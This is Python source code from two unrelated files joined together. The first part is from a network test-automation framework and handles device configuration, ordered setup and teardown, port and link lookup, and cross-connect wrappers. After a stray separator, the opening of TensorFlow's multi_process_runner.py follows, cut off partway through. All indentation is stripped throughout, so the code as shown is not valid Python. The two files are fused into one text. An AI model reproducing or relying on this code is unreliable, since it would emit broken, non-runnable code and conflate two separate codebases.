path_to_config = environment.get_conf_file(conf_name=file_name, conf_type="setup")
if not path_to_config:
message = "Cannot find given setup %s" % (file_name, )
raise TAFCoreException(message)
try:
setup = json.loads(open(path_to_config).read(), encoding='ascii')
except:
message = "Cannot read specified setup configuration: %s" % (path_to_config, )
self.class_logger.error(message)
raise IOError(message)
return setup
def _get_device_conf(self, device_id):
"""Return config entry by given Id if one, else return None.
Args:
device_id(str): Entry ID.
Returns:
dict: Entry config.
"""
return next((entry for entry in self.config if entry['id'] == device_id), None)
def id2instance(self, device_id):
"""Returns entry instance by device id.
Args:
device_id(str): Could be one of: device LINK_NAME, 'autoname' or 'id' from config.
Returns:
GenericEntry: Entry instance
Examples::
# by LINK_NAME
env.id2instance("sw1")
# by "autoname"
env.get_device_id("DEV2")
# by ID
env.get_device_id("9")
"""
dev_id = self.get_device_id(device_id)
entry = [e for e in self.config if e['id'] == dev_id][0]
instance = None
for _i in list(getattr(self, self.__dev[entry['entry_type']]['NAME']).values()):
if _i.id == dev_id:
instance = _i
break
return instance
def _append_related_confs(self, conf_ids):
"""Create dictionary with related device configurations.
Args:
conf_ids(list[str]): List of related config IDs.
Raises:
Exception: configuration is not found for specific device ID
Returns:
dict: Dictionary with related device configurations
"""
related_confs = {}
for device_id in conf_ids:
conf = self._get_device_conf(device_id)
if conf:
related_confs[device_id] = conf
else:
raise Exception("Configuration for device with id: %s not found." % device_id)
return related_confs
def safe_executor(self, obj, method, *args, **kwargs):
"""Invokes obj.method(*args, **kwargs) in try block and return error message with traceback.
Args:
obj(GenericEntry): Entry instance
method(str): method name that has to be executed
Returns:
str: Error message with traceback
Warning:
- Don't use in case obj.method has to return something.
- Don't use in case an exception has to be handled by py.test.
"""
try:
self.class_logger.debug("Perform %s(*%s, **%s) on entry_type=%s, id=%s" %
(method, args, kwargs, obj.type, obj.id))
getattr(obj, method)(*args, **kwargs)
except Exception:
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback_message = traceback.format_exception(exc_type, exc_value, exc_traceback)
message = ("Error while call %s of entry_type=%s id=%s:\n%s" %
(method, obj.type, obj.id, "".join(traceback_message)))
self.class_logger.error(message)
return message
def parallelize(self, objects, method, safe=False):
"""Run objects method in multiple threads.
Args:
objects(list[GenericEntry]): list of device objects.
method(str): method name that has to be executed.
safe(bool): Hide exception raisings, but print log message.
Returns:
None
Examples::
objects = [env.lhost[1], env.lhost[2]]
env.parallelize(objects, "cleanup", False)
"""
threads = []
def executor(o, m):
return getattr(o, m)()
for obj in objects:
func = self.safe_executor if safe else executor
thread = Thread(target=func, args=(obj, method))
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def ordered_action(self, action, prio, entry_types):
"""Perform action on entries with type in entry_types and ordered by prio.
Args:
action(str): method name to execute.
prio(str): priority name to sort objects by.
entry_types(list[str]): entry types to apply action (apply action to all entry types if None).
Returns:
None
"""
# Select all types in case list isn't set.
if not entry_types:
entry_types = list(self.__dev.keys())
# Sort by start priorities
prio_dict = self._get_prio_dict(prio)
s_list = sorted(prio_dict.keys())
# Leave only selected entry types in prio_dict
for prio in prio_dict:
for item in prio_dict[prio][:]:
if self._get_device_conf(item.id)['entry_type'] not in entry_types:
prio_dict[prio].remove(item)
for _s in s_list:
if len(prio_dict[_s]) > 1 and self.opts.use_parallel_init:
self.parallelize(prio_dict[_s], action)
else:
for obj in prio_dict[_s]:
self.class_logger.debug("Perform %s() on entry_type=%s, id=%s" %
(action, obj.type, obj.id))
getattr(obj, action)()
def _get_prio_dict(self, prio):
"""Return dict of entries by prio.
Args:
prio(str): Priority name to order dict by .
Returns:
dict: dict of lists where key = priority, value = list of device objects.
"""
prio_dict = {}
for _e in self.config:
# Set default prio value (0) in case it's not set.
_prio = _e[prio] if prio in _e else 0
# Create/append list od device objects with the same priority.
if _prio not in prio_dict:
prio_dict[_prio] = []
prio_dict[_prio].append(self.id_map[_e['id']])
return prio_dict
def initialize(self, entry_types=None):
"""Initialize test environment.
Args:
entry_types(list[str]): List of entry types
"""
self.class_logger.info("Initialize environment...")
self.ordered_action("create", "sprio", entry_types)
def cleanup(self, entry_types=None):
"""Cleaning environment.
Args:
entry_types(list[str]): List of entry types
"""
self.class_logger.info("Cleanup environment...")
self.ordered_action("cleanup", "cprio", entry_types)
def sanitize(self, entry_types=None):
"""Sanitizing environment.
Args:
entry_types(list[str]): List of entry types
"""
self.class_logger.info("Sanitizing environment...")
self.ordered_action("sanitize", "kprio", entry_types)
def check(self, entry_types=None):
"""Checking environment.
Args:
entry_types(list[str]): List of entry types
"""
self.class_logger.info("Check environment...")
self.ordered_action("check", "tprio", entry_types)
def shutdown(self, entry_types=None):
"""Stopping/Disconnecting environment.
Args:
entry_types(list[str]): List of entry types
Note:
This method cares to release all environment even an exception is raised during destroy process.
"""
# Keep all error messages and print them at the end.
# This object won't be append in case parallelize execution.
error_messages = []
# Sort by start priorities
prio_dict = self._get_prio_dict("kprio")
s_list = sorted(prio_dict.keys())
# In further method calling we set safe flag or use safe_executor
# to log and pass exceptions on destroy.
for _s in s_list:
if len(prio_dict[_s]) > 1 and self.opts.use_parallel_init:
self.parallelize(prio_dict[_s], "destroy", True)
else:
for obj in prio_dict[_s]:
err_msg = self.safe_executor(obj, "destroy")
if err_msg:
error_messages.append(err_msg)
if error_messages:
message = "The following errors encountered on environment shutdown:\n%s" % ("".join(error_messages), )
self.class_logger.error(message)
# if stdout logging is disabled print error messages anyway
if not loggers.LOG_STREAM:
sys.stderr.write("ERROR:\n%s" % (message, ))
sys.stderr.flush()
def get_device_id(self, dut):
"""Search device in config object by device name.
Args:
dut(str): Could be one of: device LINK_NAME, 'autoname' or 'id' from config.
Raises:
TAFCoreException: unknown device type
Returns:
str, int: Device id which configured.
Examples (Config object like)::
{
"env": [
{"id": 5, "port_list": [["port1", 10000], ["port2", 40000]},
{"id": 9, "autoname": "DEV2", "port_list": [["port1", 10000], ["port2", 40000]}
]
"cross": {"ID": [[5, 1, 9, 2], [5, 2, 9, 1]]}
}
Result is::
# by LINK_NAME
env.get_device_id("sw1") == 5
# by "autoname"
env.get_device_id("DEV2") == 9
# by ID
env.get_device_id(9) == 9
"""
# Find dut in dut_map if it is ID device
if dut in list(self.dut_map.values()):
return dut
# Find dut acronym in dut_map
elif dut in self.dut_map:
# If acronym in dut_map
dev_id = self.dut_map[dut]
return dev_id
# Find dut acronym in autoname_map
elif dut in self.autoname_map:
# If acronym in autoname_map
dev_id = self.autoname_map[dut]
return dev_id
# Raise an exception if invalid device type
else:
message = "This device type not found. This method supports only %s or %s device types." % (list(self.dut_map.keys()), list(self.autoname_map.keys()))
raise TAFCoreException(message)
def get_real_port_name(self, dut, port_id):
"""Search real port number/name by device name and port Id in config object.
Args:
dut(str): Could be one of: device LINK_NAME, 'autoname' or 'id' from config.
port_id(int): Port Id from config object (ids starts from 1).
Raises:
TAFCoreException: port_id is not found in configuration; device doesn't have ports or port_list attributes
Returns:
int, str: Real port number/name or exception if there is no port with given Id in config.
Examples (Config object like)::
{
"env": [
{"id": 99, "autoname": "DEV1", "port_list": [["port1", 10000], ["port2", 10000]},
{"id": 100, "ports": ["port10", 11]}
]
"cross": {"ID": [[99, 1, 100, 2], [99, 2, 100, 1]]}
}
Result is::
# by LINK_MAME
env.get_real_port_name("sw2", 2) == 11
# by "autoname"
env.get_real_port_name("DEV1", 1) == "port1"
"""
# find device ID by acronym
dev_id = self.get_device_id(dut)
# find device object
dev_obj = self.id_map[dev_id]
# find port_id in port_list
# WARNING: We HAVE to check ports and port_list in objects instead of configs,
# because some device classes modify port names.
# E.g.: json doesn't support tuples, but ports have to be hashable type.
if hasattr(dev_obj, "port_list") and dev_obj.port_list:
try:
return dev_obj.port_list[port_id - 1][0]
except IndexError:
message = "Port ID %s is not found in 'port_list' of %s(%s)." % (port_id, dev_id, dut)
raise TAFCoreException(message)
# find port_id in ports
elif hasattr(dev_obj, "ports") and dev_obj.ports:
try:
return dev_obj.ports[port_id - 1]
except IndexError:
message = "Port ID %s is not found in 'ports' of %s(%s)." % (port_id, dev_id, dut)
raise TAFCoreException(message)
else:
message = "Device %s(%s) doesn't have 'ports' or 'port_list' attributes." % (dev_id, dut)
raise TAFCoreException(message)
def get_port_speed(self, dut, port_id):
"""Search speed port in config object namely in 'port_list' by device name and port Id.
Args:
dut(str): Could be one of: device LINK_NAME, 'autoname' or 'id' from config.
port_id(int): Port Id from config object (ids starts from 1)
Raises:
TAFCoreException: port is not present in configuration's 'port_list'
Returns:
int: Port speed or exception if there is no port with given Id in config.
Examples (Config object like)::
{
"env": [
{"id": 5, "autoname": "DEV1", "port_list": [["port1", 10000], ["port2", 40000]},
{"id": 9, "ports": ["port10", 11]}
]
"cross": {"ID": [[5, 1, 9, 2], [5, 2, 9, 1]]}
}
Result is::
env.get_port_speed("sw1", 2) == 40000
env.get_port_speed("DEV1", 1) == 10000
"""
# find device id by acronym
dev_id = self.get_device_id(dut)
# find device id in config
for dev_config in self.config:
if dev_config['id'] == dev_id:
# find port_id and speed in port_list
if 'port_list' in dev_config:
try:
return dev_config['port_list'][port_id - 1][1]
# raise exception if no speed for port
except IndexError:
message = "Port id %s is not configured on device %s." % (port_id, dut)
raise TAFCoreException(message)
# raise exception if not configured port_list
else:
message = "List of ports speed is not configured on device %s." % dut
raise TAFCoreException(message)
def get_ports(self, links=None):
"""Returns dictionary of ports based on links between devices.
Args:
links(list[list]): List of devices in format [['dev1', 'dev2', number_of_links, port_speed], ] (list of lists).
Where: \a number_of_links - optional parameter(int or enum - "ALL"); \a port_speed - optional parameter.
Raises:
TAFCoreException: wrong link format
Returns:
dict: ports
Examples (Config object like)::
{
"env": [
{"id": 99, "autoname": "DEV1", "port_list": [["port1", 10000], ["port2", 40000], ["port3", 10000]},
{"id": 100, "port_list": [["port10", 40000], [11, 10000], ["port12", 40000]}
]
"cross": {"ID": [[99, 1, 100, 2], [99, 2, 100, 1]]}
}
Result is::
ports = env.get_ports([['sw1', 'sw2', 1], ])
assert ports == {('sw2', 'sw1'): {1: "port10"}, ('sw1', 'sw2'): {1: "port1"}}
ports = env.get_ports([['DEV1', 'sw2', 2], ])
assert ports == {('sw2', 'sw1'): {1: "port10", 2: 11}, ('sw1', 'sw2'): {1: "port1", 2: "port2"}}
# with optional parameter "port_speed"
ports = env.get_ports([['sw1', 'sw2', 1, 10000], ])
assert ports == {('sw1', 'sw2'): {1: "port1"}, ('sw2', 'sw1'): {1: "11"}}
# Method returns all links between devices if no any optional parameters
ports = env.get_ports([['sw1', 'sw2', ], ])
assert ports == {('sw1', 'sw2'): {1: "port1", 2: "port2"}, ('sw2', 'sw1'): {1: "port10", 2: 11}}
# The same with enum "ALL"
ports = env.get_ports([['sw1', 'sw2', "ALL"], ])
assert ports == {('sw1', 'sw2'): {1: "port1", 2: "port2"}, ('sw2', 'sw1'): {1: "port10", 2: 11}}
# With optional parameters "port_speed" and "ALL"
ports = env.get_ports([['sw1', 'sw2', "ALL", 40000], ])
assert ports == {('sw1', 'sw2'): {1: "port2"}, ('sw2', 'sw1'): {1: "port10"}}
# Method returns all links between devices if no parameter
ports = env.get_ports()
assert ports == {('sw1', 'sw2'): {1: "port1", 2: "port2"}, ('sw2', 'sw1'): {1: "port10", 2: 11}}
"""
if links:
# Create empty prototype for ports dictionary
ports = {}
for link in links:
# if not specified all devices
if len(link) < 2:
message = "At list is not specified devices."
raise TAFCoreException(message)
ports[(link[0], link[1])] = {}
ports[(link[1], link[0])] = {}
# Process each link in links
for link in links:
# link Ids counter
link_id = 0
# if not specified number of links return all links between devices
if len(link) == 2:
link.append("ALL")
# if number of links specified zero then raise exception
if link[2] == 0:
message = "Number of links cannot equal zero."
raise TAFCoreException(message)
# the flag indicates that was set parameter port_speed
port_speed_flag = False
if len(link) == 4:
port_speed_flag = True
port_speed = link[3]
# ports Ids counter
ports_count = link[2]
if link[2] == "ALL":
ports_count = 1
# Process setups for each cross
for cross_id in self.setup['cross']:
# Each link in setup
for setup_link in self.setup['cross'][cross_id]:
# This list will contain port Ids from setup
port_ids = []
try:
# Search for link in setup. Compare links by devices ID
if [setup_link[0], setup_link[2]] == [self.get_device_id(link[0]), self.get_device_id(link[1])]:
port_ids = [setup_link[1], setup_link[3]]
elif [setup_link[2], setup_link[0]] == [self.get_device_id(link[0]), self.get_device_id(link[1])]:
port_ids = [setup_link[3], setup_link[1]]
except TAFCoreException as err:
message = "Insufficient devices count required for test"
pytest.skip(message)
# Append ports
if port_ids:
if port_speed_flag:
if link_id < ports_count:
if self.get_port_speed(link[0], port_ids[0]) == self.get_port_speed(link[1], port_ids[1]) == port_speed:
link_id += 1
ports[(link[0], link[1])][link_id] = self.get_real_port_name(link[0], port_ids[0])
ports[(link[1], link[0])][link_id] = self.get_real_port_name(link[1], port_ids[1])
else:
if link_id < ports_count:
link_id += 1
ports[(link[0], link[1])][link_id] = self.get_real_port_name(link[0], port_ids[0])
ports[(link[1], link[0])][link_id] = self.get_real_port_name(link[1], port_ids[1])
if link[2] == "ALL":
ports_count += 1
# If all links are collected
if link_id == ports_count:
break
if link[2] == "ALL":
ports_count = link_id
# Verify that ports dictionary full filed
if (len(ports[(link[0], link[1])]) < ports_count or
len(ports[(link[1], link[0])]) < ports_count or
not ports[(link[0], link[1])] or
not ports[(link[1], link[0])]):
if port_speed_flag:
message = "No links with required speed {0}".format(port_speed)
else:
message = "Insufficient links count required for test"
pytest.skip(message)
self.class_logger.debug("Got the following ports: %s." % (ports, ))
return ports
else:
ports = {}
# create tuples of existing device connection pairs
for cross_id in self.setup['cross']:
for setup_link in self.setup['cross'][cross_id]:
ports[setup_link[0], setup_link[2]] = {}
ports[setup_link[2], setup_link[0]] = {}
# Process each tuple in ports
for key in ports:
# link Ids counter
link_id = 0
# Process setups for each cross
for cross_id in self.setup['cross']:
# Each link in setup
for setup_link in self.setup['cross'][cross_id]:
# Search for link in setup. Compare links by devices ID
if [setup_link[0], setup_link[2]] == [self.get_device_id(key[0]), self.get_device_id(key[1])]:
link_id += 1
# Append ports
ports[(key[0], key[1])][link_id] = self.get_real_port_name(key[0], setup_link[1])
elif [setup_link[2], setup_link[0]] == [self.get_device_id(key[0]), self.get_device_id(key[1])]:
link_id += 1
ports[(key[0], key[1])][link_id] = self.get_real_port_name(key[0], setup_link[3])
self.class_logger.debug("Got the following ports: %s." % (ports, ))
return ports
class Cross(dict):
"""New interface to cross object without device id.
"""
def __init__(self, setup, env):
"""Initialize Cross class.
"""
super(Cross, self).__init__()
self.setup = setup
self.env = env
if hasattr(env, "cross"):
for key, value in list(env.cross.items()):
self[key] = value
def get_device_id(self, connection):
"""Search device in setup object by given connection.
Args:
connection(list): Connection info in format [sw1, port1, sw2, port2]
Raises:
Exception: no device in connection
Returns:
int: device id which own connection
"""
connection_reverse = connection[2:] + connection[:2]
try:
match = next(cross_id for cross_id, crosses in self.setup['cross'].items()
if connection in crosses or connection_reverse in crosses)
# keys() is not guaranteed to be stable, why does this work?
return list(self.setup['cross'].keys()).index(match) + 1
except StopIteration:
raise Exception("Can not find device with such connection: %s in config" % connection)
def xconnect(self, connection):
"""Wrapper for xconnect method defined in xconnect.py module.
Args:
connection(list): Connection info in format [sw1, port1, sw2, port2]
"""
id_real_device = self.get_device_id(connection)
return self[id_real_device].xconnect(connection)
def xdisconnect(self, connection):
"""Wrapper for xdisconnect method defined in xconnect.py module.
Args:
connection(list): in format [sw1, port1, sw2, port2]
"""
id_real_device = self.get_device_id(connection)
return self[id_real_device].xdisconnect(connection)
def cross_connect(self, conn_list):
"""Wrapper for cross_connect method defined in xconnect.py module.
Args:
conn_list(list[list]): List of connections
Raises:
Exception: conn_list is empty
"""
if conn_list:
connection = conn_list[0]
id_real_device = self.get_device_id(connection)
return self[id_real_device].cross_connect([connection])
else:
raise Exception("conn_list is empty")
def cross_disconnect(self, disconn_list):
"""Wrapper for cross_disconnect method defined in xconnect.py module.
Args:
disconn_list(list[list]): List of connections
Raises:
Exception: disconn_list is empty
"""
if disconn_list:
connection = disconn_list[0]
id_real_device = self.get_device_id(connection)
return self[id_real_device].cross_disconnect(disconn_list)
else:
raise Exception("disconn_list is empty")
def get_connection(self, dev_id, port_no):
"""Get connection for device port.
Args:
dev_id(str): Device ID/autoname/linkname ('tg1')
port_no(int): Device port number.
Raises:
Exception: no connection for current port
Returns:
list: Connection info
"""
# Get device
device_id = self.env.get_device_id(dev_id)
dev_obj = self.env.id_map[device_id]
# Get port_id from port_no
port_id = dev_obj.ports.index(port_no)
# Check for connection in setup
connection = None
for device in self.setup['cross']:
for conn in self.setup['cross'][device]:
if (device_id == conn[0] and port_id == conn[1] - 1) or (device_id == conn[2] and port_id == conn[3] - 1):
connection = conn
break
if connection is None:
raise Exception("Port {0} on device {1} is not used in current setup.".format(port_no, dev_id))
# dev_id has to be source
if connection[0] != device_id:
connection = connection[2:] + connection[:2]
return connection
def device_port_disconnect(self, dev_id, port_no):
"""Connect/Disconnect device port.
Args:
dev_id(str): Device ID/autoname/linkname ('tg1')
port_no(int): Device port number.
"""
# Get connection
connection = self.get_connection(dev_id, port_no)
# Emulate port disconnection
self.cross_disconnect([connection, ])
def device_port_connect(self, dev_id, port_no):
"""Connect/Disconnect device port.
Args:
dev_id(str): Device ID/autoname/linkname ('tg1')
port_no(int): Device port number.
"""
# Get connection
connection = self.get_connection(dev_id, port_no)
# Emulate port connection
self.cross_connect([connection, ])
|
multi_process_runner.py | # Lint as: python3
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Multi-process runner for testing purpose."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import contextlib
import json
import os
import signal
import sys
import threading
import time
import unittest
from absl import logging
import six
from six.moves import queue as Queue
from tensorflow.python import tf2
from tensorflow.python.compat import v2_compat
from tensorflow.python.distribute import multi_process_lib
from tensorflow.python.eager import context
multiprocessing = multi_process_lib.multiprocessing
# pylint: disable=g-import-not-at-top
try:
# `faulthandler` is not available in py2.
import faulthandler
except ImportError:
faulthandler = None
# TODO(b/150264776): Remove after resolving CI issue.
try:
import dill
except ImportError:
dill = None
# TODO(b/150264776): Remove after resolving CI issue.
try:
import tblib.pickling_support
# For pickling traceback objects.
tblib.pickling_support.install()
except ImportError:
pass
# _ProcessStatusInfo contains process status information. When is_successful
# attribute is True, the subprocess has ended successfully, or if False, the
# exception stack trace info is stored in exc_info to pass on to parent process
# to be re-raised.
_ProcessStatusInfo = collections.namedtuple(
'_ProcessStatusInfo', ['is_successful', 'exc_info', 'return_value'])
# Information returned from a successful MultiProcessRunner run.
MultiProcessRunnerResult = collections.namedtuple('MultiProcessRunnerResult',
['return_value', 'stdout'])
TestEnvironment = collections.namedtuple('TestEnvironment', [
'task_type', 'task_id', 'cluster_spec', 'rpc_layer', 'grpc_fail_fast',
'v2_enabled', 'executing_eagerly'
])
# Resources for communication between worker processes and the main process.
#
# `process_status_queue` is used by `multi_process_runner` internally for
# communication from subprocesses to the parent process for whether it's been
# successful, and if not what the error stack trace is.
# `parent_to_sub_queue` is used for communications from parent to subprocess.
# Currently this is only used to terminate subprocesses.
# TODO(rchao): Remove this once subprocess is terminated by SIGKILL.
# `streaming_pipe_w` is to stream stdout and stderr from subprocesses to parent
# process.
# `barrier` is a barrier for the party of all subprocesses.
Resources = collections.namedtuple('Resources', [
'process_status_queue', 'parent_to_sub_queue', 'streaming_pipe_w', 'barrier'
])
# Default time out sec is selected so that it's handled before the default
# "medium" timeout of the test runs.
_DEFAULT_TIMEOUT_SEC = 200
class MultiProcessRunner(object):
"""A utility class to start multiple processes to simulate a cluster.
We need to use multiple processes to simulate a cluster in TF 2.0 tests
because TF 2.0 has some process-global data structures that have to be
separated by processes. We also need child processes to test out our fault
tolerance because shutting down a standard TensorFlow server within its
process is not supported.
Note: the main test program that uses this runner class must run main program
via `test_main` defined in this file. Using this runner in non-test binaries
is not supported yet.
This class is not thread-safe. Child processes will inherit TF2 behavior flag.
"""
def __init__(self,
proc_func,
cluster_spec,
rpc_layer=None,
max_run_time=None,
grpc_fail_fast=None,
stream_stdout=True,
list_stdout=False,
use_dill_for_args=True,
daemon=False,
args=None,
kwargs=None):
"""Creates a multi-process runner.
Args:
proc_func: Function to be run on child processes. This will be run on
processes for all task types.
cluster_spec: Dict for cluster spec. The following is an example of
cluster with three workers and two ps's.
{"worker": ["worker0.example.com:2222",
"worker1.example.com:2222",
"worker2.example.com:2222"],
"ps": ["ps0.example.com:2222",
"ps1.example.com:2222"]}
rpc_layer: RPC layer to use. Default value is 'grpc+loas'.
max_run_time: If set, child processes is forced to exit at approximately
this many seconds after `start` is called. We achieve this through
`signal.alarm()` api. Note that this is best effort at Python level
since Python signal handler does not get executed when it runs lower
level C/C++ code. So it can be delayed for arbitrarily long time.
grpc_fail_fast: Whether GRPC connection between processes should fail
without retrying. Defaults to None, in which case the environment
variable is not explicitly set.
stream_stdout: True if the output/error from the subprocesses should be
streamed to be printed in parent process' log. Defaults to True.
list_stdout: True if the output/error from the subprocesses should be
collected to be attached to the resulting `MultiProcessRunnerResult`
returned from `MultiProcessRunner.join()`. If True, the list of stdout
can be retrieved via `MultiProcessRunnerResult.stdout` attribute.
Defaults to False.
use_dill_for_args: Whether to use dill to pickle `args` and `kwargs`. dill
can pickle more objects, but doesn't work with types in
`multiprocessing` library like `Mutex`.
daemon: Whether to start processes as daemons.
args: Positional arguments to be sent to functions run on processes.
kwargs: Keyword arguments to be sent to functions run on processes.
Raises:
RuntimeError: if `multi_process_runner.test_main()` is not called.
ValueError: if there are more than one chief in the `cluster_spec`.
"""
assert cluster_spec is not None
if 'chief' in cluster_spec and len(cluster_spec['chief']) > 1:
raise ValueError('If chief exists in the cluster, there must be at most '
'one chief. Current `cluster_spec` has {} chiefs.'
.format(len(cluster_spec['chief'])))
if not multi_process_lib.initialized():
raise RuntimeError('`multi_process_runner` is not initialized. '
'Please call `multi_process_runner.test_main()` '
'within `if __name__ == \'__main__\':` block '
'in your python module to properly initialize '
'`multi_process_runner`.')
if not callable(proc_func):
raise ValueError('proc_func is not a callable')
self._proc_func = proc_func
self._cluster_spec = cluster_spec
self._rpc_layer = rpc_layer
self._max_run_time = max_run_time
self._grpc_fail_fast = grpc_fail_fast
self._stream_stdout = stream_stdout
# TODO(rchao): Revisit list_stdout argument to consider other solution.
self._list_stdout = list_stdout
self._dependence_on_chief = True
self._use_dill_for_args = use_dill_for_args
self._daemon = daemon
self._args = args or ()
self._kwargs = kwargs or {}
# Child processes should have the same v2 and eager behavior.
self._v2_enabled = tf2.enabled()
self._executing_eagerly = context.executing_eagerly()
self._joined = False
self._processes = {}
self._outstanding_subprocess_count = 0
self._reading_threads = []
self._manager = multiprocessing.Manager()
self._process_status_queue = self._manager.Queue()
self._parent_to_sub_queue = self._manager.Queue()
parties = sum(len(addresses) for addresses in self._cluster_spec.values())
self._barrier = self._manager.Barrier(parties)
# We use a queue to collect outputs from worker processes since it's thread
# safe.
self._streaming_queue = self._manager.Queue()
# This flag will be set to True once terminate_all() is called.
self._all_forced_terminated = False
def _continuously_readline_from_sub(self, pipe_r, task_type, task_id):
"""Function to continuously read lines from subprocesses."""
with os.fdopen(pipe_r.fileno(), 'r', closefd=False) as reader:
for line in reader:
task_string = '[{}-{}]:'.format(task_type, task_id)
formatted_line = '{} {}'.format(task_string.ljust(14), line)
if self._stream_stdout:
# TODO(rchao): Use a lock here to ensure the printed lines are not
# broken.
print(formatted_line, end='', flush=True)
if self._list_stdout:
self._streaming_queue.put(formatted_line)
def _start_subprocess_and_reading_thread(self,
task_type,
task_id,
cluster_spec=None,
proc_func=None,
args=None,
kwargs=None):
"""Start a subprocess and a thread the reads lines from the subprocess."""
if dill is None:
raise unittest.SkipTest(
'TODO(b/150264776): Resolve dependency issue in CI')
test_env = TestEnvironment(
task_type=task_type,
task_id=task_id,
cluster_spec=cluster_spec or self._cluster_spec,
rpc_layer=self._rpc_layer,
grpc_fail_fast=self._grpc_fail_fast,
v2_enabled=self._v2_enabled,
executing_eagerly=self._executing_eagerly,
)
pipe_r, pipe_w = multiprocessing.Pipe(duplex=False)
resources = Resources(
process_status_queue=self._process_status_queue,
parent_to_sub_queue=self._parent_to_sub_queue,
streaming_pipe_w=pipe_w,
barrier=self._barrier,
)
if proc_func is None:
proc_func, args, kwargs = self._proc_func, self._args, self._kwargs
# Always use dill to pickle proc_func so that we support more callable
# types, e.g. lambda.
proc_func = dill.dumps(proc_func, dill.HIGHEST_PROTOCOL)
if self._use_dill_for_args:
args = dill.dumps(args, dill.HIGHEST_PROTOCOL)
kwargs = dill.dumps(kwargs, dill.HIGHEST_PROTOCOL)
p = _Process(
test_env=test_env,
target=_ProcFunc(),
args=(resources, test_env, proc_func, args, kwargs,
self._use_dill_for_args),
daemon=self._daemon)
p.start()
self._processes[(task_type, task_id)] = p
self._outstanding_subprocess_count += 1
# For each subprocess, we dedicate a thread continuously reading lines
# from them.
thread = threading.Thread( # pylint: disable=unexpected-keyword-arg
target=self._continuously_readline_from_sub,
args=(pipe_r, task_type, task_id))
thread.start()
self._reading_threads.append(thread)
def start(self):
"""Starts processes, one for each task in `cluster_spec`.
Note that this is best effort by the applicable multiprocessing library,
and it may take up to seconds for a subprocess to be successfully started.
"""
if self._processes:
raise ValueError('MultiProcessRunner already started.')
for task_type, addresses in self._cluster_spec.items():
for task_id, _ in enumerate(addresses):
self._start_subprocess_and_reading_thread(task_type, task_id)
# TODO(rchao): Remove the need of using SIGALRM if possible. At this time,
# without this the tests become very flaky.
if self._max_run_time is not None:
def handler(signum, frame):
del signum, frame
self.terminate_all()
signal.signal(signal.SIGALRM, handler)
signal.alarm(self._max_run_time)
def start_in_process_as(self, as_task_type, as_task_id):
"""Start the processes, with the specified task run in main process.
This is similar to `start()` except that the task with task_type
`as_task_type` and task_id `as_task_id` is run in the main process.
This method is particularly useful when debugging tool such as `pdb` is
needed in some specific task. Note that since this method is blocking until
that specific task exits, additional actions would need a thread to be
called:
```python
def proc_func():
# user code to be run
import pdb; pdb.set_trace()
def follow_ups():
time.sleep(5)
mpr.start_single_process(
task_type='evaluator',
task_id=0)
mpr = multi_process_runner.MultiProcessRunner(
proc_func,
multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=1))
threading.Thread(target=follow_ups).start()
mpr.start_in_process_as(as_task_type='chief', as_task_id=0)
mpr.join()
```
Note that if `list_stdout=True`, the logs/stdout by task
run by the main process is not available in result.stdout.
Args:
as_task_type: The task type to be run in the main process.
as_task_id: The task id to be run in the main process.
"""
if self._processes:
raise ValueError('MultiProcessRunner already started.')
for task_type, addresses in self._cluster_spec.items():
for task_id, _ in enumerate(addresses):
if not (task_type == as_task_type and task_id == as_task_id):
self._start_subprocess_and_reading_thread(task_type, task_id)
_set_tf_config(as_task_type, as_task_id, self._cluster_spec,
self._rpc_layer)
self._proc_func(*self._args, **self._kwargs)
def start_single_process(self,
task_type,
task_id,
cluster_spec=None,
proc_func=None,
args=None,
kwargs=None):
"""Starts a single process.
This starts a process in the cluster with the task type, task id, and the
process function (`proc_func`). If process function is `None`, the function
provided at `__init__` will be used. If `cluster_spec` is `None`, the
cluster spec provided at `__init__` will be used.
TODO(rchao): It is meant that all subprocesses will be updated with the new
cluster spec, but this has yet to be implemented. At this time only the
newly started subprocess picks up this updated cluster spec.
Args:
task_type: The task type.
task_id: The task id.
cluster_spec: The cluster spec to be used on the newly started
process. If `None`, the cluster spec provided at `__init__` will be
used.
proc_func: The process function to be run on the newly started
process. If specified, specify `args` and `kwargs` as well. If `None`,
the function provided at `__init__` will be used.
args: Optional positional arguments to be supplied in `proc_func`.
kwargs: Optional keyword arguments to be supplied in `proc_func`.
"""
self._start_subprocess_and_reading_thread(
task_type,
task_id,
cluster_spec=cluster_spec,
proc_func=proc_func,
args=args or (),
kwargs=kwargs or {})
def _queue_to_list(self, queue_to_convert):
"""Convert `queue.Queue` to `list`."""
list_to_return = []
# Calling `queue.empty()` is not reliable.
while True:
try:
list_to_return.append(queue_to_convert.get(block=False))
except Queue.Empty:
break
return list_to_return
def get_process_id(self, task_type, task_id):
"""Returns the subprocess id given the task type and task id."""
p = self._processes.get((task_type, task_id), None)
return p.pid if p else None
def _join_or_terminate(self, task_type, task_id, process, timeout):
"""Joins a process. If it times out, terminate all procsses."""
logging.info('joining %s-%d', task_type, task_id)
process.join(timeout)
# If exitcode is None, the process aren't terminated and this is a
# timeout.
if process.exitcode is None:
# Force termination to dump worker processes stack trace.
self.terminate_all(sig=signal.SIGTERM)
process_statuses = self._queue_to_list(self._process_status_queue)
raise SubprocessTimeoutError(
'%s-%d and possibly more subprocesses timed out.' %
(task_type, task_id), self._get_mpr_result(process_statuses))
def join(self, timeout=_DEFAULT_TIMEOUT_SEC):
"""Joins all the processes with timeout.
Args:
timeout: if set and not all processes report status within roughly
`timeout` seconds, a `SubprocessTimeoutError` exception will be raised.
Returns:
A MultiProcessRunnerResult object, which has two attributes,
`return_value` and `stdout`. `return_value` always contains the return
values from the subprocesses. If `list_stdout` argument is True at
`__init__`, `stdout` is available that contains a list of all messages
from subprocesses' stdout and stderr.
Raises:
SubprocessTimeoutError: if not all processes report status approximatelty
within `timeout` seconds. When this is raised, a
`MultiProcessRunnerResult` object can be retrieved by
`SubprocessTimeoutError`'s mpr_result attribute, which has the same
structure as above 'Returns' section describes.
